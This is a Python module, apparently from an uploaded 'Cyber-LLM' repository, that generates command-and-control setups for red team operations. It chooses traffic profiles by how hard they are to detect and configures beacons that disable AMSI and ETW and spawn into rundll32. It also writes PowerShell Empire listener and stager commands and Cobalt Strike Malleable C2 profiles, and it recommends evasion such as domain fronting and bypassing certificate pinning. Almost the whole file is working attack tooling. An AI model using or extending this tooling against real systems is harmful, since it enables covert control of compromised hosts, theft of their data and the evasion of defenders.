cyber_llm / src /agents /c2_agent.py
unit731's picture
Upload core Cyber-LLM platform components
23804b3 verified
"""
Cyber-LLM C2 Agent
Command and Control (C2) configuration and management agent.
Handles Empire, Cobalt Strike, and custom C2 framework integration.
Author: Muzan Sano
Email: [email protected]
"""
import json
import logging
import random
import time
from typing import Dict, List, Any, Optional
from dataclasses import dataclass
from pydantic import BaseModel
import yaml
from datetime import datetime, timedelta
# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class C2Request(BaseModel):
payload_type: str
target_environment: str
network_constraints: Dict[str, Any]
stealth_level: str = "high"
duration: int = 3600 # seconds
class C2Response(BaseModel):
c2_profile: Dict[str, Any]
beacon_config: Dict[str, Any]
empire_commands: List[str]
cobalt_strike_config: Dict[str, Any]
opsec_mitigations: List[str]
monitoring_setup: Dict[str, Any]
class C2Agent:
"""
Advanced Command and Control agent for red team operations.
Manages C2 infrastructure, beacon configuration, and OPSEC.
"""
def __init__(self, config_path: Optional[str] = None):
self.config = self._load_config(config_path)
self.c2_profiles = self._load_c2_profiles()
self.opsec_rules = self._load_opsec_rules()
def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]:
"""Load C2 configuration from YAML file."""
if config_path:
with open(config_path, 'r') as f:
return yaml.safe_load(f)
return {
"default_jitter": "20%",
"default_sleep": 60,
"max_beacon_life": 86400,
"kill_date_offset": 7 # days
}
def _load_c2_profiles(self) -> Dict[str, Any]:
"""Load C2 communication profiles."""
return {
"http_get": {
"name": "HTTP GET Profile",
"protocol": "http",
"method": "GET",
"uri": ["/api/v1/status", "/health", "/metrics", "/ping"],
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
},
"detection_risk": "low"
},
"http_post": {
"name": "HTTP POST Profile",
"protocol": "http",
"method": "POST",
"uri": ["/api/v1/upload", "/submit", "/contact", "/feedback"],
"headers": {
"Content-Type": "application/x-www-form-urlencoded"
},
"detection_risk": "medium"
},
"dns_tunnel": {
"name": "DNS Tunneling Profile",
"protocol": "dns",
"subdomain_prefix": ["api", "cdn", "mail", "ftp"],
"detection_risk": "low",
"bandwidth": "limited"
},
"https_cert": {
"name": "HTTPS with Valid Certificate",
"protocol": "https",
"cert_required": True,
"detection_risk": "very_low",
"setup_complexity": "high"
}
}
def _load_opsec_rules(self) -> Dict[str, Any]:
"""Load OPSEC rules and guidelines."""
return {
"timing": {
"min_sleep": 30,
"max_sleep": 300,
"jitter_range": [10, 50],
"burst_limit": 5
},
"infrastructure": {
"domain_age_min": 30, # days
"ssl_cert_required": True,
"cdn_recommended": True
},
"operational": {
"kill_date_max": 30, # days
"beacon_rotation": True,
"payload_obfuscation": True
}
}
def select_c2_profile(self, environment: str, constraints: Dict[str, Any]) -> Dict[str, Any]:
"""
Select optimal C2 profile based on target environment and constraints.
# HUMAN_APPROVAL_REQUIRED: Review C2 profile selection for operational security
"""
# Analyze network constraints
blocked_ports = constraints.get("blocked_ports", [])
proxy_present = constraints.get("proxy", False)
ssl_inspection = constraints.get("ssl_inspection", False)
# Score profiles based on constraints
profile_scores = {}
for profile_name, profile in self.c2_profiles.items():
score = 100 # Base score
# Adjust for blocked ports
if profile["protocol"] == "http" and 80 in blocked_ports:
score -= 50
elif profile["protocol"] == "https" and 443 in blocked_ports:
score -= 50
elif profile["protocol"] == "dns" and 53 in blocked_ports:
score -= 80
# Adjust for SSL inspection
if ssl_inspection and profile["protocol"] == "https":
score -= 30
# Adjust for proxy
if proxy_present and profile["protocol"] in ["http", "https"]:
score += 20 # Proxy can help blend traffic
# Consider detection risk
risk_penalties = {
"very_low": 0,
"low": -5,
"medium": -15,
"high": -30
}
score += risk_penalties.get(profile.get("detection_risk", "medium"), -15)
profile_scores[profile_name] = score
# Select best profile
best_profile = max(profile_scores, key=profile_scores.get)
selected_profile = self.c2_profiles[best_profile].copy()
selected_profile["selection_score"] = profile_scores[best_profile]
selected_profile["selection_reason"] = f"Best fit for {environment} environment"
logger.info(f"Selected C2 profile: {best_profile} (score: {profile_scores[best_profile]})")
return selected_profile
def configure_beacon(self, profile: Dict[str, Any], stealth_level: str) -> Dict[str, Any]:
"""Configure beacon parameters based on profile and stealth requirements."""
# Base configuration
base_sleep = self.config.get("default_sleep", 60)
jitter = self.config.get("default_jitter", "20%")
# Adjust for stealth level
stealth_multipliers = {
"low": {"sleep": 0.5, "jitter": 10},
"medium": {"sleep": 1.0, "jitter": 20},
"high": {"sleep": 2.0, "jitter": 30},
"maximum": {"sleep": 5.0, "jitter": 50}
}
multiplier = stealth_multipliers.get(stealth_level, stealth_multipliers["medium"])
beacon_config = {
"sleep_time": int(base_sleep * multiplier["sleep"]),
"jitter": f"{multiplier['jitter']}%",
"max_dns_requests": 5,
"user_agent": profile.get("headers", {}).get("User-Agent", ""),
"kill_date": (datetime.now() + timedelta(days=self.config.get("kill_date_offset", 7))).isoformat(),
"spawn_to": "C:\\Windows\\System32\\rundll32.exe",
"post_ex": {
"amsi_disable": True,
"etw_disable": True,
"spawnto_x86": "C:\\Windows\\SysWOW64\\rundll32.exe",
"spawnto_x64": "C:\\Windows\\System32\\rundll32.exe"
}
}
# Add protocol-specific configuration
if profile["protocol"] == "dns":
beacon_config.update({
"dns_idle": "8.8.8.8",
"dns_max_txt": 252,
"dns_ttl": 1
})
elif profile["protocol"] in ["http", "https"]:
beacon_config.update({
"uri": random.choice(profile.get("uri", ["/"])),
"headers": profile.get("headers", {})
})
return beacon_config
def generate_empire_commands(self, profile: Dict[str, Any], beacon_config: Dict[str, Any]) -> List[str]:
"""Generate PowerShell Empire commands for C2 setup."""
commands = [
"# PowerShell Empire C2 Setup",
"use listener/http",
f"set Name {profile.get('name', 'http_listener')}",
f"set Host {profile.get('host', '0.0.0.0')}",
f"set Port {profile.get('port', 80)}",
f"set DefaultJitter {beacon_config['jitter']}",
f"set DefaultDelay {beacon_config['sleep_time']}",
"execute",
"",
"# Generate stager",
"use stager/multi/launcher",
f"set Listener {profile.get('name', 'http_listener')}",
"set OutFile /tmp/launcher.ps1",
"execute"
]
return commands
def generate_cobalt_strike_config(self, profile: Dict[str, Any], beacon_config: Dict[str, Any]) -> Dict[str, Any]:
"""Generate Cobalt Strike Malleable C2 profile configuration."""
cs_config = {
"global": {
"jitter": beacon_config["jitter"],
"sleeptime": beacon_config["sleep_time"],
"useragent": beacon_config.get("user_agent", "Mozilla/5.0"),
"sample_name": "Cyber-LLM C2",
},
"http-get": {
"uri": profile.get("uri", ["/"])[0],
"client": {
"header": profile.get("headers", {}),
"metadata": {
"base64url": True,
"parameter": "session"
}
},
"server": {
"header": {
"Server": "nginx/1.18.0",
"Cache-Control": "max-age=0, no-cache",
"Connection": "keep-alive"
},
"output": {
"base64": True,
"print": True
}
}
},
"http-post": {
"uri": "/api/v1/submit",
"client": {
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"id": {
"parameter": "id"
},
"output": {
"parameter": "data"
}
},
"server": {
"header": {
"Server": "nginx/1.18.0"
},
"output": {
"base64": True,
"print": True
}
}
}
}
return cs_config
def assess_opsec_compliance(self, config: Dict[str, Any]) -> List[str]:
"""Assess OPSEC compliance and generate mitigation recommendations."""
mitigations = []
# Check sleep time
if config.get("sleep_time", 0) < self.opsec_rules["timing"]["min_sleep"]:
mitigations.append("Increase sleep time to reduce detection risk")
# Check jitter
jitter_val = int(config.get("jitter", "0%").replace("%", ""))
if jitter_val < self.opsec_rules["timing"]["jitter_range"][0]:
mitigations.append("Increase jitter to add timing randomization")
# Check kill date
if "kill_date" not in config:
mitigations.append("Set kill date to prevent indefinite operation")
# Infrastructure checks
mitigations.extend([
"Use domain fronting or CDN for traffic obfuscation",
"Implement certificate pinning bypass techniques",
"Rotate C2 infrastructure regularly",
"Monitor for blue team detection signatures"
])
return mitigations
def setup_monitoring(self, profile: Dict[str, Any]) -> Dict[str, Any]:
"""Setup monitoring and logging for C2 operations."""
monitoring_config = {
"beacon_logging": {
"enabled": True,
"log_level": "INFO",
"log_file": f"/var/log/c2/{profile.get('name', 'default')}.log"
},
"health_checks": {
"interval": 300, # seconds
"endpoints": [
f"http://localhost/health",
f"http://localhost/api/status"
]
},
"alerting": {
"enabled": True,
"channels": ["slack", "email"],
"triggers": {
"beacon_death": True,
"detection_signature": True,
"infrastructure_compromise": True
}
},
"metrics": {
"active_beacons": 0,
"successful_callbacks": 0,
"failed_callbacks": 0,
"data_exfiltrated": "0 MB"
}
}
return monitoring_config
def execute_c2_setup(self, request: C2Request) -> C2Response:
"""
Execute complete C2 setup workflow.
# HUMAN_APPROVAL_REQUIRED: Review C2 configuration before deployment
"""
logger.info(f"Setting up C2 for payload type: {request.payload_type}")
# Select optimal C2 profile
profile = self.select_c2_profile(request.target_environment, request.network_constraints)
# Configure beacon
beacon_config = self.configure_beacon(profile, request.stealth_level)
# Generate framework-specific configurations
empire_commands = self.generate_empire_commands(profile, beacon_config)
cs_config = self.generate_cobalt_strike_config(profile, beacon_config)
# OPSEC assessment
opsec_mitigations = self.assess_opsec_compliance(beacon_config)
# Setup monitoring
monitoring_setup = self.setup_monitoring(profile)
response = C2Response(
c2_profile=profile,
beacon_config=beacon_config,
empire_commands=empire_commands,
cobalt_strike_config=cs_config,
opsec_mitigations=opsec_mitigations,
monitoring_setup=monitoring_setup
)
logger.info(f"C2 setup complete for {request.target_environment}")
return response
def main():
"""CLI interface for C2Agent."""
import argparse
parser = argparse.ArgumentParser(description="Cyber-LLM C2 Agent")
parser.add_argument("--payload-type", required=True, help="Type of payload (powershell, executable, dll)")
parser.add_argument("--environment", required=True, help="Target environment description")
parser.add_argument("--stealth", choices=["low", "medium", "high", "maximum"],
default="high", help="Stealth level")
parser.add_argument("--config", help="Path to configuration file")
parser.add_argument("--output", help="Output file for results")
args = parser.parse_args()
# Initialize agent
agent = C2Agent(config_path=args.config)
# Create request (simplified for CLI)
request = C2Request(
payload_type=args.payload_type,
target_environment=args.environment,
network_constraints={
"blocked_ports": [22, 23],
"proxy": True,
"ssl_inspection": False
},
stealth_level=args.stealth
)
# Execute C2 setup
response = agent.execute_c2_setup(request)
# Output results
result = {
"c2_profile": response.c2_profile,
"beacon_config": response.beacon_config,
"empire_commands": response.empire_commands,
"cobalt_strike_config": response.cobalt_strike_config,
"opsec_mitigations": response.opsec_mitigations,
"monitoring_setup": response.monitoring_setup
}
if args.output:
with open(args.output, 'w') as f:
json.dump(result, f, indent=2)
print(f"C2 configuration saved to {args.output}")
else:
print(json.dumps(result, indent=2))
if __name__ == "__main__":
main()